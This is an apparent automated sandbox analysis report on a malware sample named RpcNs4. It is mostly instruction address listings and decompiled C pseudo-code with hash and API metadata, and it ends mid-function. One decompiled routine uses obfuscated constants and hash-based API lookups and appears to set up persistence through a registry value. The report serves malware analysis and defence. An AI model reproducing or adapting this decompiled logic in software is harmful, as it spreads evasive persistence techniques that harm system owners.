                                                                                                      0x020b6ea8
                                                                                                      0x020b6ea8
                                                                                                      0x020b6eac
                                                                                                      0x020b6eb1
                                                                                                      0x020b6eb3
                                                                                                      0x020b6eb5
                                                                                                      0x020b6eb8
                                                                                                      0x020b6ebd
                                                                                                      0x020b6ec3
                                                                                                      0x020b6ec7
                                                                                                      0x020b6ec7
                                                                                                      0x020b6ecb
                                                                                                      0x020b6ecb
                                                                                                      0x00000000
                                                                                                      0x020b6ecb
                                                                                                      0x020b6ea2
                                                                                                      0x020b6e9b
                                                                                                      0x020b6e90
                                                                                                      0x020b6e8a
                                                                                                      0x020b6e7f
                                                                                                      0x020b696e
                                                                                                      0x020b696e
                                                                                                      0x020b6ad1
                                                                                                      0x020b6ade
                                                                                                      0x020b6ae6
                                                                                                      0x020b6afb
                                                                                                      0x020b6b02
                                                                                                      0x020b6b06
                                                                                                      0x020b6b0b
                                                                                                      0x020b6b10
                                                                                                      0x020b6b18
                                                                                                      0x020b6b20
                                                                                                      0x020b6b25
                                                                                                      0x020b6b2a
                                                                                                      0x020b6b2d
                                                                                                      0x020b6b2f
                                                                                                      0x020b6c97
                                                                                                      0x020b6c9d
                                                                                                      0x020b6ca4
                                                                                                      0x020b6ca7
                                                                                                      0x020b6cac
                                                                                                      0x020b6cac
                                                                                                      0x020b6caf
                                                                                                      0x020b6cbc
                                                                                                      0x020b6cc4
                                                                                                      0x020b6ccc
                                                                                                      0x020b6cd1
                                                                                                      0x020b6cd6
                                                                                                      0x020b6cda
                                                                                                      0x020b6ce2
                                                                                                      0x020b6cea
                                                                                                      0x020b6cf2
                                                                                                      0x020b6cfa
                                                                                                      0x020b6cfe
                                                                                                      0x020b6d07
                                                                                                      0x020b6d15
                                                                                                      0x020b6d19
                                                                                                      0x020b6d21
                                                                                                      0x020b6d29
                                                                                                      0x020b6d35
                                                                                                      0x020b6d39
                                                                                                      0x020b6df4
                                                                                                      0x020b6df4
                                                                                                      0x020b6d3f
                                                                                                      0x020b6d45
                                                                                                      0x020b6d47
                                                                                                      0x020b6d61
                                                                                                      0x020b6d61
                                                                                                      0x020b6d67
                                                                                                      0x020b6d74
                                                                                                      0x020b6d7c
                                                                                                      0x020b6d84
                                                                                                      0x020b6d89
                                                                                                      0x020b6d8e
                                                                                                      0x020b6d92
                                                                                                      0x020b6d9a
                                                                                                      0x020b6da2
                                                                                                      0x020b6daa
                                                                                                      0x020b6db2
                                                                                                      0x020b6db6
                                                                                                      0x020b6dc4
                                                                                                      0x020b6dc8
                                                                                                      0x020b6dd0
                                                                                                      0x020b6dd8
                                                                                                      0x020b6df0
                                                                                                      0x020b6df0
                                                                                                      0x020b6df6
                                                                                                      0x020b6dfc
                                                                                                      0x020b6dfe
                                                                                                      0x020b6e16
                                                                                                      0x020b6e18
                                                                                                      0x020b6e18
                                                                                                      0x020b6e1e
                                                                                                      0x020b6e2b
                                                                                                      0x020b6e2f
                                                                                                      0x020b6e34
                                                                                                      0x020b6e3a
                                                                                                      0x020b6e3d
                                                                                                      0x020b6e41
                                                                                                      0x020b6e49
                                                                                                      0x020b6e51
                                                                                                      0x020b6e59
                                                                                                      0x020b6e5d
                                                                                                      0x020b6e65
                                                                                                      0x020b6e67
                                                                                                      0x020b6e6c
                                                                                                      0x00000000
                                                                                                      0x020b6b35
                                                                                                      0x020b6b35
                                                                                                      0x020b6b3d
                                                                                                      0x020b6b42
                                                                                                      0x020b6b50
                                                                                                      0x020b6b54
                                                                                                      0x020b6b5c
                                                                                                      0x020b6b64
                                                                                                      0x020b6b6c
                                                                                                      0x020b6b71
                                                                                                      0x020b6b79
                                                                                                      0x020b6b81
                                                                                                      0x020b6b89
                                                                                                      0x020b6b91
                                                                                                      0x020b6b9d
                                                                                                      0x020b6ba1
                                                                                                      0x020b6c3e
                                                                                                      0x020b6c3e
                                                                                                      0x020b6ba7
                                                                                                      0x020b6ba7
                                                                                                      0x020b6bac
                                                                                                      0x020b6bae
                                                                                                      0x020b6bc1
                                                                                                      0x020b6bc6
                                                                                                      0x020b6bc6
                                                                                                      0x020b6bcb
                                                                                                      0x020b6bd3
                                                                                                      0x020b6be1
                                                                                                      0x020b6be5
                                                                                                      0x020b6bed
                                                                                                      0x020b6bf5
                                                                                                      0x020b6bfd
                                                                                                      0x020b6c02
                                                                                                      0x020b6c0a
                                                                                                      0x020b6c12
                                                                                                      0x020b6c1a
                                                                                                      0x020b6c22
                                                                                                      0x020b6c2a
                                                                                                      0x020b6c2c
                                                                                                      0x020b6c38
                                                                                                      0x020b6c3a
                                                                                                      0x020b6c3a
                                                                                                      0x020b6c40
                                                                                                      0x020b6c45
                                                                                                      0x020b6c47
                                                                                                      0x020b6c4e
                                                                                                      0x020b6c53
                                                                                                      0x020b6c58
                                                                                                      0x020b6c5a
                                                                                                      0x020b6c5f
                                                                                                      0x020b6c5f
                                                                                                      0x020b6c64
                                                                                                      0x020b6c6c
                                                                                                      0x020b6c74
                                                                                                      0x020b6c7c
                                                                                                      0x020b6c80
                                                                                                      0x020b6c88
                                                                                                      0x020b6c8a
                                                                                                      0x020b6c8f
                                                                                                      0x020b6511
                                                                                                      0x020b6511
                                                                                                      0x00000000
                                                                                                      0x020b6516
                                                                                                      0x020b6974
                                                                                                      0x020b6974
                                                                                                      0x020b6979
                                                                                                      0x020b6a3d
                                                                                                      0x020b6a42
                                                                                                      0x020b6a88
                                                                                                      0x020b6a8d
                                                                                                      0x00000000
                                                                                                      0x020b6a93
                                                                                                      0x020b6a93
                                                                                                      0x020b6a98
                                                                                                      0x020b6a9a
                                                                                                      0x020b6aa1
                                                                                                      0x020b6aa6
                                                                                                      0x020b6aad
                                                                                                      0x020b6ab2
                                                                                                      0x020b6ab2
                                                                                                      0x020b6ab7
                                                                                                      0x020b6ac5
                                                                                                      0x020b6ac7
                                                                                                      0x00000000
                                                                                                      0x020b6ac7
                                                                                                      0x020b6a44
                                                                                                      0x020b6a44
                                                                                                      0x020b6a75
                                                                                                      0x020b6a79
                                                                                                      0x020b6a7e
                                                                                                      0x00000000
                                                                                                      0x020b6a46
                                                                                                      0x020b6a46
                                                                                                      0x020b6a4b
                                                                                                      0x020b6a67
                                                                                                      0x020b6a6b
                                                                                                      0x00000000
                                                                                                      0x020b6a4d
                                                                                                      0x020b6a4d
                                                                                                      0x020b6a52
                                                                                                      0x00000000
                                                                                                      0x020b6a58
                                                                                                      0x020b6a58
                                                                                                      0x00000000
                                                                                                      0x020b6a58
                                                                                                      0x020b6a52
                                                                                                      0x020b6a4b
                                                                                                      0x020b6a44
                                                                                                      0x020b697f
                                                                                                      0x020b697f
                                                                                                      0x020b6a26
                                                                                                      0x020b6a2b
                                                                                                      0x020b6a2d
                                                                                                      0x00000000
                                                                                                      0x020b6a33
                                                                                                      0x020b6a33
                                                                                                      0x00000000
                                                                                                      0x020b6a33
                                                                                                      0x020b6985
                                                                                                      0x020b6985
                                                                                                      0x020b698a
                                                                                                      0x020b69f7
                                                                                                      0x020b69fc
                                                                                                      0x00000000
                                                                                                      0x020b6a02
                                                                                                      0x020b6a02
                                                                                                      0x020b6a12
                                                                                                      0x020b6a19
                                                                                                      0x020b6a1e
                                                                                                      0x00000000
                                                                                                      0x020b6a1e
                                                                                                      0x020b698c
                                                                                                      0x020b698c
                                                                                                      0x020b69b9
                                                                                                      0x020b69bd
                                                                                                      0x020b69c2
                                                                                                      0x020b69c4
                                                                                                      0x00000000
                                                                                                      0x020b69ca
                                                                                                      0x020b69ca
                                                                                                      0x020b69ce
                                                                                                      0x020b69d6
                                                                                                      0x020b69db
                                                                                                      0x020b69df
                                                                                                      0x020b69e4
                                                                                                      0x020b69e9
                                                                                                      0x020b69ed
                                                                                                      0x020b69ed
                                                                                                      0x00000000
                                                                                                      0x020b698e
                                                                                                      0x020b698e
                                                                                                      0x020b6993
                                                                                                      0x020b69af
                                                                                                      0x00000000
                                                                                                      0x020b6995
                                                                                                      0x020b6995
                                                                                                      0x020b699a
                                                                                                      0x00000000
                                                                                                      0x020b69a0
                                                                                                      0x020b69a0
                                                                                                      0x020b69a5
                                                                                                      0x00000000
                                                                                                      0x020b69a5
                                                                                                      0x020b699a
                                                                                                      0x020b6993
                                                                                                      0x020b698c
                                                                                                      0x020b698a
                                                                                                      0x020b697f
                                                                                                      0x020b6979
                                                                                                      0x020b696e
                                                                                                      0x00000000
                                                                                                      0x020b677e
                                                                                                      0x020b677e
                                                                                                      0x020b677e
                                                                                                      0x020b6790
                                                                                                      0x00000000
                                                                                                      0x020b6790
                                                                                                      0x020b6511

                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.257541494.00000000020B1000.00000020.00000001.sdmp, Offset: 020B0000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.257535197.00000000020B0000.00000004.00000001.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.257576055.00000000020BD000.00000004.00000001.sdmp Download File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_20b0000_RpcNs4.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CountTick
                                                                                                      • String ID: ]($>$?F$?F
                                                                                                      • API String ID: 536389180-2428406117
                                                                                                      • Opcode ID: 2e291f299f49d680e97378266013ca839c7d507f70c3ea71eb1b07defe114652
                                                                                                      • Instruction ID: 28c97bfc9505b2f627c56637d5da62200189dcfaf110d3e62e3d76d932cee21d
                                                                                                      • Opcode Fuzzy Hash: 2e291f299f49d680e97378266013ca839c7d507f70c3ea71eb1b07defe114652
                                                                                                      • Instruction Fuzzy Hash: 3942E2716093028BC77BDE6894541EFBAEAAF80704F144D2EE552DB250EB72CD14DB93
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      C-Code - Quality: 100%
                                                                                                      			E0041989E(short _a4, intOrPtr _a8) {
                                                                                                      				short _t13;
                                                                                                      				short _t28;
                                                                                                      
                                                                                                      				_t28 = _a4;
                                                                                                      				if(_t28 != 0 &&  *_t28 != 0 && E00418AEC(_t28, ?str?) != 0) {
                                                                                                      					if(E00418AEC(_t28, ?str?) != 0) {
                                                                                                      						return E0041CFA6(_t28);
                                                                                                      					}
                                                                                                      					if(GetLocaleInfoW( *(_a8 + 8), 0x2000000b,  &_a4, 2) == 0) {
                                                                                                      						L9:
                                                                                                      						return 0;
                                                                                                      					}
                                                                                                      					return _a4;
                                                                                                      				}
                                                                                                      				if(GetLocaleInfoW( *(_a8 + 8), 0x20001004,  &_a4, 2) == 0) {
                                                                                                      					goto L9;
                                                                                                      				}
                                                                                                      				_t13 = _a4;
                                                                                                      				if(_t13 == 0) {
                                                                                                      					return GetACP();
                                                                                                      				}
                                                                                                      				return _t13;
                                                                                                      			}





                                                                                                      0x004198a2
                                                                                                      0x004198a7
                                                                                                      0x004198cf
                                                                                                      0x00000000
                                                                                                      0x004198f8
                                                                                                      0x004198ea
                                                                                                      0x00419916
                                                                                                      0x00000000
                                                                                                      0x00419916
                                                                                                      0x00000000
                                                                                                      0x004198ec
                                                                                                      0x00419914
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x0041991a
                                                                                                      0x0041991f
                                                                                                      0x00419923
                                                                                                      0x00419923
                                                                                                      0x004198f1

                                                                                                      APIs
                                                                                                      • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,?,?,00419B64,?,00000000), ref: 004198E2
                                                                                                      • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,?,?,00419B64,?,00000000), ref: 0041990C
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.256448974.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.256423838.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.256635443.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.256647032.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.256660274.0000000000439000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.256692564.000000000044E000.00000002.00020000.sdmp Download File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_RpcNs4.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InfoLocale
                                                                                                      • String ID: ACP$OCP
                                                                                                      • API String ID: 2299586839-711371036
                                                                                                      • Opcode ID: cabdbbd5868a657c31b8c1cdf763834c51e0b95cee304dc5e2cd22d40fd77b4c
                                                                                                      • Instruction ID: c15aaa84b1a0d257b2612772592e480fa80fbb188541d3fbec629ad599b2e7d0
                                                                                                      • Opcode Fuzzy Hash: cabdbbd5868a657c31b8c1cdf763834c51e0b95cee304dc5e2cd22d40fd77b4c
                                                                                                      • Instruction Fuzzy Hash: 20018431214216ABDB10AF25DC51FD737A8AF05764B00842BFA08DA250EB68DDC18798
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      C-Code - Quality: 59%
                                                                                                      			E020B7830() {
                                                                                                      				char _v520;
                                                                                                      				char _v524;
                                                                                                      				intOrPtr _v528;
                                                                                                      				signed int _v532;
                                                                                                      				signed int _v536;
                                                                                                      				signed int _v540;
                                                                                                      				signed int _v544;
                                                                                                      				signed int _v548;
                                                                                                      				signed int _v552;
                                                                                                      				intOrPtr _v556;
                                                                                                      				void* __ebx;
                                                                                                      				void* __ebp;
                                                                                                      				intOrPtr* _t99;
                                                                                                      				intOrPtr* _t101;
                                                                                                      				intOrPtr* _t103;
                                                                                                      				intOrPtr* _t105;
                                                                                                      				intOrPtr* _t109;
                                                                                                      				signed int _t110;
                                                                                                      				signed int _t114;
                                                                                                      				void* _t116;
                                                                                                      				intOrPtr* _t123;
                                                                                                      				intOrPtr* _t125;
                                                                                                      				intOrPtr _t169;
                                                                                                      				intOrPtr* _t172;
                                                                                                      				intOrPtr* _t174;
                                                                                                      				char _t181;
                                                                                                      				short* _t183;
                                                                                                      				signed int _t184;
                                                                                                      				void* _t185;
                                                                                                      				void* _t187;
                                                                                                      				signed int* _t188;
                                                                                                      				void* _t190;
                                                                                                      
                                                                                                      				_t188 =  &_v552;
                                                                                                      				_v548 = 0xeeab;
                                                                                                      				_v548 = _v548 | 0x6dce4c9a;
                                                                                                      				_v548 = _v548 << 2;
                                                                                                      				_v548 = _v548 + 0x198f;
                                                                                                      				_v548 = _v548 >> 0x10;
                                                                                                      				_v548 = _v548 >> 1;
                                                                                                      				_v548 = _v548 ^ 0x80005b9c;
                                                                                                      				_v536 = 0x34b4;
                                                                                                      				_v536 = _v536 + 0x3c7b;
                                                                                                      				_v528 = 0;
                                                                                                      				_v536 = _v536 * 0x77;
                                                                                                      				_t184 = 0x253dbac1;
                                                                                                      				_v536 = _v536 | 0xbcf8f1a3;
                                                                                                      				_v536 = _v536 ^ 0xbcfcfdfb;
                                                                                                      				_v540 = 0x2009;
                                                                                                      				_v540 = _v540 << 0xb;
                                                                                                      				_v540 = _v540 * 0x70;
                                                                                                      				_v540 = _v540 ^ 0xb744029b;
                                                                                                      				_v540 = _v540 >> 5;
                                                                                                      				_v540 = _v540 ^ 0x063adc14;
                                                                                                      				_v552 = 0xa931;
                                                                                                      				_v552 = _v552 >> 7;
                                                                                                      				_v552 = _v552 ^ 0xe9d384a4;
                                                                                                      				_v552 = _v552 * 0x27;
                                                                                                      				_v552 = _v552 >> 0x10;
                                                                                                      				_v552 = _v552 ^ 0xb4ee4ed8;
                                                                                                      				_v552 = _v552 + 0xe2e0;
                                                                                                      				_v552 = _v552 << 0xb;
                                                                                                      				_v552 = _v552 ^ 0x7da60802;
                                                                                                      				_v532 = 0x8e5f;
                                                                                                      				_v532 = _v532 >> 3;
                                                                                                      				_v532 = _v532 + 0xfffff8b9;
                                                                                                      				_v532 = _v532 ^ 0x00000a84;
                                                                                                      				_v544 = 0xd5ba;
                                                                                                      				_v544 = _v544 | 0x12ead79f;
                                                                                                      				_v544 = _v544 * 8 - _v544;
                                                                                                      				_v544 = _v544 >> 0xf;
                                                                                                      				_v544 = _v544 | 0xff00e8e0;
                                                                                                      				_v544 = _v544 ^ 0xff01e8f6;
                                                                                                      				_t181 = _v524;
                                                                                                      				while(1) {
                                                                                                      					L1:
                                                                                                      					_t190 = _t184 - 0x253dbac1;
                                                                                                      					if(_t190 > 0) {
                                                                                                      						break;
                                                                                                      					}
                                                                                                      					if(_t190 == 0) {
                                                                                                      						_t184 = 0x255e35f7;
                                                                                                      						continue;
                                                                                                      					} else {
                                                                                                      						if(_t184 == 0x14fcf8) {
                                                                                                      							_t105 =  *0x20be024;
                                                                                                      							if(_t105 == 0) {
                                                                                                      								_t105 = E020B3DD0(_t137, E020B3E70(0x60f9cb2), 0x18d8497, _t187);
                                                                                                      								 *0x20be024 = _t105;
                                                                                                      							}
                                                                                                      							 *_t105(_v524);
                                                                                                      							return _v532;
                                                                                                      						} else {
                                                                                                      							if(_t184 == 0x2110e07c) {
                                                                                                      								_t109 =  *0x20bdbe8;
                                                                                                      								if(_t109 == 0) {
                                                                                                      									_t109 = E020B3DD0(_t137, E020B3E70(0xbb51e2dc), 0x7293aecb, _t187);
                                                                                                      									 *0x20bdbe8 = _t109;
                                                                                                      								}
                                                                                                      								_t110 =  *_t109( &_v520);
                                                                                                      								_t172 =  *0x20be314;
                                                                                                      								_v532 = 2 + _t110 * 2;
                                                                                                      								if(_t172 == 0) {
                                                                                                      									_t172 = E020B3DD0(_t137, E020B3E70(0x60f9cb2), 0x3564370d, _t187);
                                                                                                      									 *0x20be314 = _t172;
                                                                                                      								}
                                                                                                      								_t114 =  *_t172(_v528, _t181, _v536, _v548,  &_v524, _v532);
                                                                                                      								_t184 = 0x14fcf8;
                                                                                                      								asm("sbb ebx, ebx");
                                                                                                      								_t137 =  ~_t114 + 1;
                                                                                                      								_v556 =  ~_t114 + 1;
                                                                                                      								continue;
                                                                                                      							} else {
                                                                                                      								if(_t184 != 0x23c70ed5) {
                                                                                                      									L24:
                                                                                                      									if(_t184 != 0x197b8a17) {
                                                                                                      										continue;
                                                                                                      									} else {
                                                                                                      										return _v528;
                                                                                                      									}
                                                                                                      								} else {
                                                                                                      									_t183 =  *0x20be368 + 0x14;
                                                                                                      									while( *_t183 != 0x5c) {
                                                                                                      										_t183 = _t183 + 2;
                                                                                                      									}
                                                                                                      									_t181 = _t183 + 2;
                                                                                                      									_t184 = 0x30e25292;
                                                                                                      									continue;
                                                                                                      								}
                                                                                                      							}
                                                                                                      						}
                                                                                                      					}
                                                                                                      					L36:
                                                                                                      				}
                                                                                                      				if(_t184 == 0x255e35f7) {
                                                                                                      					_t185 = E020B3460(0x20bd9e0);
                                                                                                      					_t99 =  *0x20bdf10;
                                                                                                      					if(_t99 == 0) {
                                                                                                      						_t99 = E020B3DD0(_t137, E020B3E70(0xe60124ba), 0xec538b3a, _t187);
                                                                                                      						 *0x20bdf10 = _t99;
                                                                                                      					}
                                                                                                      					_t169 =  *0x20be368;
                                                                                                      					 *_t99( &_v520, 0x104, _t185, _t169 + 0x220, _t169 + 0x14);
                                                                                                      					_t101 =  *0x20bddc8;
                                                                                                      					_t188 =  &(_t188[5]);
                                                                                                      					if(_t101 == 0) {
                                                                                                      						_t101 = E020B3DD0(_t137, E020B3E70(0xbb51e2dc), 0x298e8809, _t187);
                                                                                                      						 *0x20bddc8 = _t101;
                                                                                                      					}
                                                                                                      					_t137 =  *_t101();
                                                                                                      					_t103 =  *0x20bdbec;
                                                                                                      					if(_t103 == 0) {
                                                                                                      						_t103 = E020B3DD0(_t137, E020B3E70(0xbb51e2dc), 0x632f374, _t187);
                                                                                                      						 *0x20bdbec = _t103;
                                                                                                      					}
                                                                                                      					 *_t103(_t137, 0, _t185);
                                                                                                      					_t184 = 0x23c70ed5;
                                                                                                      					goto L1;
                                                                                                      				} else {
                                                                                                      					if(_t184 == 0x30e25292) {
                                                                                                      						_t116 = E020B3460(0x20bda60);
                                                                                                      						_t174 =  *0x20be198;
                                                                                                      						_t187 = _t116;
                                                                                                      						if(_t174 == 0) {
                                                                                                      							_t174 = E020B3DD0(_t137, E020B3E70(0x60f9cb2), 0x5a5d94d9, _t187);
                                                                                                      							 *0x20be198 = _t174;
                                                                                                      						}
                                                                                                      						 *_t174(_v548, _t187, _v536, 0, _v540, _v552, 0,  &_v524, 0);
                                                                                                      						asm("sbb esi, esi");
                                                                                                      						_t123 =  *0x20bddc8;
                                                                                                      						_t184 = (_t184 & 0xf86aa99b) + 0x2110e07c;
                                                                                                      						if(_t123 == 0) {
                                                                                                      							_t123 = E020B3DD0(_t137, E020B3E70(0xbb51e2dc), 0x298e8809, _t187);
                                                                                                      							 *0x20bddc8 = _t123;
                                                                                                      						}
                                                                                                      						_t137 =  *_t123();
                                                                                                      						_t125 =  *0x20bdbec;
                                                                                                      						if(_t125 == 0) {
                                                                                                      							_t125 = E020B3DD0(_t137, E020B3E70(0xbb51e2dc), 0x632f374, _t187);
                                                                                                      							 *0x20bdbec = _t125;
                                                                                                      						}
                                                                                                      						 *_t125(_t137, 0, _t187);
                                                                                                      					}
                                                                                                      					goto L24;
                                                                                                      				}
                                                                                                      				goto L36;
                                                                                                      			}



































                                                                                                      0x020b7830
                                                                                                      0x020b7836
                                                                                                      0x020b7840
                                                                                                      0x020b7848
                                                                                                      0x020b784d
                                                                                                      0x020b7855
                                                                                                      0x020b785a
                                                                                                      0x020b785e
                                                                                                      0x020b7866
                                                                                                      0x020b786e
                                                                                                      0x020b7876
                                                                                                      0x020b7883
                                                                                                      0x020b7887
                                                                                                      0x020b788c
                                                                                                      0x020b7894
                                                                                                      0x020b789c
                                                                                                      0x020b78a4
                                                                                                      0x020b78ae
                                                                                                      0x020b78b2
                                                                                                      0x020b78ba
                                                                                                      0x020b78bf
                                                                                                      0x020b78c7
                                                                                                      0x020b78cf
                                                                                                      0x020b78d4
                                                                                                      0x020b78e1
                                                                                                      0x020b78e5
                                                                                                      0x020b78ea
                                                                                                      0x020b78f2
                                                                                                      0x020b78fa
                                                                                                      0x020b78ff
                                                                                                      0x020b7907
                                                                                                      0x020b790f
                                                                                                      0x020b7914
                                                                                                      0x020b791c
                                                                                                      0x020b7924
                                                                                                      0x020b792c
                                                                                                      0x020b7941
                                                                                                      0x020b7945
                                                                                                      0x020b794a
                                                                                                      0x020b7952
                                                                                                      0x020b795a
                                                                                                      0x020b7960
                                                                                                      0x020b7960
                                                                                                      0x020b7960
                                                                                                      0x020b7966
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x020b796c
                                                                                                      0x020b7a42
                                                                                                      0x00000000
                                                                                                      0x020b7972
                                                                                                      0x020b7978
                                                                                                      0x020b7be4
                                                                                                      0x020b7beb
                                                                                                      0x020b7bfe
                                                                                                      0x020b7c03
                                                                                                      0x020b7c03
                                                                                                      0x020b7c0c
                                                                                                      0x020b7c1c
                                                                                                      0x020b797e
                                                                                                      0x020b7984
                                                                                                      0x020b79b4
                                                                                                      0x020b79bb
                                                                                                      0x020b79ce
                                                                                                      0x020b79d3
                                                                                                      0x020b79d3
                                                                                                      0x020b79dd
                                                                                                      0x020b79df
                                                                                                      0x020b79ec
                                                                                                      0x020b79f2
                                                                                                      0x020b7a0a
                                                                                                      0x020b7a0c
                                                                                                      0x020b7a0c
                                                                                                      0x020b7a2b
                                                                                                      0x020b7a2f
                                                                                                      0x020b7a36
                                                                                                      0x020b7a38
                                                                                                      0x020b7a39
                                                                                                      0x00000000
                                                                                                      0x020b7986
                                                                                                      0x020b798c
                                                                                                      0x020b7b1c
                                                                                                      0x020b7b22
                                                                                                      0x00000000
                                                                                                      0x020b7b28
                                                                                                      0x020b7b36
                                                                                                      0x020b7b36
                                                                                                      0x020b7992
                                                                                                      0x020b7998
                                                                                                      0x020b799f
                                                                                                      0x020b79a1
                                                                                                      0x020b79a4
                                                                                                      0x020b79aa
                                                                                                      0x020b79ad
                                                                                                      0x00000000
                                                                                                      0x020b79ad
                                                                                                      0x020b798c
                                                                                                      0x020b7984
                                                                                                      0x020b7978
                                                                                                      0x00000000
                                                                                                      0x020b796c
                                                                                                      0x020b7a52
                                                                                                      0x020b7b41
                                                                                                      0x020b7b43
                                                                                                      0x020b7b4a
                                                                                                      0x020b7b5d
                                                                                                      0x020b7b62
                                                                                                      0x020b7b62
                                                                                                      0x020b7b67
                                                                                                      0x020b7b83
                                                                                                      0x020b7b85
                                                                                                      0x020b7b8a
                                                                                                      0x020b7b8f
                                                                                                      0x020b7ba2
                                                                                                      0x020b7ba7
                                                                                                      0x020b7ba7
                                                                                                      0x020b7bae
                                                                                                      0x020b7bb0
                                                                                                      0x020b7bb7
                                                                                                      0x020b7bca
                                                                                                      0x020b7bcf
                                                                                                      0x020b7bcf
                                                                                                      0x020b7bd8
                                                                                                      0x020b7bda
                                                                                                      0x00000000
                                                                                                      0x020b7a58
                                                                                                      0x020b7a5e
                                                                                                      0x020b7a69
                                                                                                      0x020b7a6e
                                                                                                      0x020b7a74
                                                                                                      0x020b7a78
                                                                                                      0x020b7a90
                                                                                                      0x020b7a92
                                                                                                      0x020b7a92
                                                                                                      0x020b7ab8
                                                                                                      0x020b7abc
                                                                                                      0x020b7abe
                                                                                                      0x020b7ac9
                                                                                                      0x020b7ad1
                                                                                                      0x020b7ae4
                                                                                                      0x020b7ae9
                                                                                                      0x020b7ae9
                                                                                                      0x020b7af0
                                                                                                      0x020b7af2
                                                                                                      0x020b7af9
                                                                                                      0x020b7b0c
                                                                                                      0x020b7b11
                                                                                                      0x020b7b11
                                                                                                      0x020b7b1a
                                                                                                      0x020b7b1a
                                                                                                      0x00000000
                                                                                                      0x020b7a5e
                                                                                                      0x00000000

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.257541494.00000000020B1000.00000020.00000001.sdmp, Offset: 020B0000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.257535197.00000000020B0000.00000004.00000001.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.257576055.00000000020BD000.00000004.00000001.sdmp Download File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_20b0000_RpcNs4.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: $7d5${<
                                                                                                      • API String ID: 0-4015853822
                                                                                                      • Opcode ID: 58376f65a474b473c6ec9545e0a2d0a8b06b17f935a7dcd4fb25bac1abb9de03
                                                                                                      • Instruction ID: c14647d5da84b85d1e2187e028f0c74621464aa62e9c0ed5c814d336ae18cd0a
                                                                                                      • Opcode Fuzzy Hash: 58376f65a474b473c6ec9545e0a2d0a8b06b17f935a7dcd4fb25bac1abb9de03
                                                                                                      • Instruction Fuzzy Hash: 7BA1BF32A083018BD36AEF28D485A9BB7E5FFC8344F104D2DE595972A0E774DE059B82
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      C-Code - Quality: 74%
                                                                                                      			E00406A89(intOrPtr __ebx, intOrPtr __edx, intOrPtr __esi, intOrPtr _a4, signed int _a8, intOrPtr _a12) {
                                                                                                      				char _v0;
                                                                                                      				signed int _v8;
                                                                                                      				intOrPtr _v524;
                                                                                                      				intOrPtr _v528;
                                                                                                      				void* _v532;
                                                                                                      				intOrPtr _v536;
                                                                                                      				char _v540;
                                                                                                      				intOrPtr _v544;
                                                                                                      				intOrPtr _v548;
                                                                                                      				intOrPtr _v552;
                                                                                                      				intOrPtr _v556;
                                                                                                      				intOrPtr _v560;
                                                                                                      				intOrPtr _v564;
                                                                                                      				intOrPtr _v568;
                                                                                                      				intOrPtr _v572;
                                                                                                      				intOrPtr _v576;
                                                                                                      				intOrPtr _v580;
                                                                                                      				intOrPtr _v584;
                                                                                                      				char _v724;
                                                                                                      				intOrPtr _v792;
                                                                                                      				char _v800;
                                                                                                      				signed int _v804;
                                                                                                      				intOrPtr _v808;
                                                                                                      				char _v812;
                                                                                                      				void* __edi;
                                                                                                      				signed int _t41;
                                                                                                      				char* _t46;
                                                                                                      				char* _t48;
                                                                                                      				intOrPtr _t59;
                                                                                                      				intOrPtr _t60;
                                                                                                      				intOrPtr _t65;
                                                                                                      				intOrPtr _t66;
                                                                                                      				int _t67;
                                                                                                      				intOrPtr _t68;
                                                                                                      				signed int _t69;
                                                                                                      
                                                                                                      				_t68 = __esi;
                                                                                                      				_t65 = __edx;
                                                                                                      				_t59 = __ebx;
                                                                                                      				_t41 =  *0x435040; // 0x4b97bcea
                                                                                                      				_t42 = _t41 ^ _t69;
                                                                                                      				_v8 = _t41 ^ _t69;
                                                                                                      				if(_a4 != 0xffffffff) {
                                                                                                      					_push(_a4);
                                                                                                      					E00406A64(_t42);
                                                                                                      					_pop(_t60);
                                                                                                      				}
                                                                                                      				_v804 = _v804 & 0x00000000;
                                                                                                      				E0040F6A0( &_v800, 0, 0x4c);
                                                                                                      				_v812 =  &_v804;
                                                                                                      				_t46 =  &_v724;
                                                                                                      				_v808 = _t46;
                                                                                                      				_v548 = _t46;
                                                                                                      				_v552 = _t60;
                                                                                                      				_v556 = _t65;
                                                                                                      				_v560 = _t59;
                                                                                                      				_v564 = _t68;
                                                                                                      				_v568 = _t66;
                                                                                                      				_v524 = ss;
                                                                                                      				_v536 = cs;
                                                                                                      				_v572 = ds;
                                                                                                      				_v576 = es;
                                                                                                      				_v580 = fs;
                                                                                                      				_v584 = gs;
                                                                                                      				asm("pushfd");
                                                                                                      				_pop( *_t23);
                                                                                                      				_v540 = _v0;
                                                                                                      				_t48 =  &_v0;
                                                                                                      				_v528 = _t48;
                                                                                                      				_v724 = 0x10001;
